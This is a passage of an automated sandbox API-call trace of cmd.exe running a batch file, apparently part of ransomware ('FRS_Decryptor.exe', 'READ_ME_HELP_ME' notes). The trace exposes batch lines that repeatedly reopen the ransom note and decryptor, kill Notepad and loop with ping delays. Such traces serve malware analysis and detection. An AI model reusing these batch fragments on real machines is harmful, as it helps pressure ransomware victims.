(hFile=0x158) returned 0x1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0078.550] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0078.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0078.550] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.550] GetFileType (hFile=0x158) returned 0x1 [0078.550] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0078.551] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0078.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0078.551] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.551] GetFileType (hFile=0x158) returned 0x1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0078.551] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0078.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0078.551] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.551] GetFileType (hFile=0x158) returned 0x1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0078.551] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0078.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0078.551] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.551] GetFileType (hFile=0x158) returned 0x1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0078.551] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0078.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0078.551] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.551] GetFileType (hFile=0x158) returned 0x1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0078.551] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0078.551] SetFilePointer (in: hFile=0x158, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0078.551] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0078.552] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.552] GetFileType (hFile=0x158) returned 0x1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0078.552] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0078.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0078.552] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.552] GetFileType (hFile=0x158) returned 0x1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0078.552] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0078.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0078.552] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.552] GetFileType (hFile=0x158) returned 0x1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0078.552] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0078.552] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0078.552] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0078.552] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0078.553] _get_osfhandle (_FileHandle=1) returned 0x28 [0078.553] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0078.554] _get_osfhandle (_FileHandle=0) returned 0x24 [0078.554] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0078.554] SetConsoleInputExeNameW () returned 0x1 [0078.554] GetConsoleOutputCP () returned 0x1b5 [0078.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0078.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.554] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.554] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0078.554] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.554] SetFilePointer (in: hFile=0x158, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0078.554] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0078.554] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0078.555] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0078.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0078.555] GetFileType (hFile=0x158) returned 0x1 [0078.555] _get_osfhandle (_FileHandle=3) returned 0x158 [0078.555] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0078.555] _tell (_FileHandle=3) returned 2512 [0078.555] _close (_FileHandle=3) returned 0 [0078.555] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0078.555] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0078.555] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0078.555] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0078.555] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0078.555] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0078.555] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0078.555] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0078.555] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0078.555] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0078.555] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0078.555] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0078.555] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0078.555] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0078.555] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0078.555] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0078.555] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0078.555] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0078.555] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0078.555] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0078.555] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0078.555] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0078.555] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0078.555] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0078.555] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0078.555] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0078.555] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0078.555] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0078.555] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0078.555] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0078.555] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0078.555] _wcsicmp (_String1="ping", _String2="START") returned -3 [0078.555] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0078.555] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0078.555] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0078.555] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0078.555] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0078.555] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0078.555] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0078.555] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0078.555] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0078.556] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0078.556] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0078.556] SetErrorMode (uMode=0x0) returned 0x0 [0078.556] SetErrorMode (uMode=0x1) returned 0x0 [0078.556] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0078.556] SetErrorMode (uMode=0x0) returned 0x1 [0078.556] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.556] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.556] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.556] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0078.556] GetLastError () returned 0x2 [0078.556] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0078.556] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0078.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0078.556] GetLastError () returned 0x2 [0078.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0078.556] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0078.556] GetFileType (hFile=0x28) returned 0x2 [0078.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0078.557] _dup (_FileHandle=1) returned 3 [0078.557] _close (_FileHandle=1) returned 0 [0078.557] _wcsicmp (_String1="nul", _String2="con") returned 11 [0078.557] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0078.557] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0078.557] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.557] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0078.557] SetErrorMode (uMode=0x0) returned 0x0 [0078.557] SetErrorMode (uMode=0x1) returned 0x0 [0078.557] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0078.557] SetErrorMode (uMode=0x0) returned 0x1 [0078.557] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0078.557] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0078.557] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0078.557] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.557] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0078.557] GetLastError () returned 0x2 [0078.557] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0078.557] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59bf0 [0078.558] FindClose (in: hFindFile=0xd59bf0 | out: hFindFile=0xd59bf0) returned 1 [0078.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0078.558] GetLastError () returned 0x2 [0078.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0078.558] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0078.558] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0078.558] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0078.558] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0078.558] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0078.558] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0078.559] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0078.559] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0078.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x34c, dwProcessId=0xb84, dwThreadId=0xb80)) returned 1 [0078.561] CloseHandle (hObject=0x34c) returned 1 [0078.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0078.561] GetEnvironmentStringsW () returned 0xd30508* [0078.562] FreeEnvironmentStringsA (penv="=") returned 1 [0078.562] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0080.629] GetExitCodeProcess (in: 